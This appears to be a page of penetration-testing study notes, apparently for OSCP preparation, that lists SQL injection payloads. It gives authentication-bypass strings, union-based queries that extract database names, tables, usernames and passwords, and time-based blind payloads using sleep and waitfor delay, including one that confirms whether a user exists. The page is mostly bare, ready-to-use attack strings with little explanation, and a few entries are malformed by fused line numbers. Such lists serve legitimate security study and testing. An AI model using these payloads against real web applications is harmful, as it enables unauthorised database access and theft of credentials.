// notes/ Web Exploitation
🕸️

SQL Injection Payloads

Notes from oscp.adot8.com — web applications.

#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection_payloads

Payloads

code
01or 1=1
02or 1=1-- -
03or 1=1-- - //
04or 1=1#
05or 1=1/
06' or 1=1
07' or 1=1-- -
08' or 1=1#
09' or 1=1/
10' or 1=1-- - //
11' or 1=1 in (select @@version)-- - //
12' or 1=1 in (select * from users)-- -//
13' or 1=1 in (select passwords from users)-- -//
14' or 1=1 in (select password from users where username = 'admin') -- //

Union based

<pre><code>' order by 1-- - ' order by 1-- // <strong>' union select database(), user(), @@version, null, null -- // &#x3C;-- 5 columns </strong>' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- // ' union select null, username, password, description, null from users -- // </code></pre>

Blind SQLi

code
011 or sleep(5)#
021 or sleep 5-- -
031 or sleep 5--
041 or sleep (5-)-
05' or sleep(5)-- -
06" or sleep(5)="
07' or sleep(5)='
08'waitfor delay '0:0:5'--
09;waitfor delay '0:0:5'--
10';waitfor delay '0:0:5'--
11' AND IF (1=1, sleep(3), 'false') -- -
12' AND IF (1=1, sleep(3), 'false') -- //

{% hint style="info" %} If the query is looking a specific user we can append the payload and if it hangs for 3 seconds that means that the user exists

adot8' AND IF (1=1, sleep(3), 'false') -- - {% endhint %}

Terminators

code
01-- -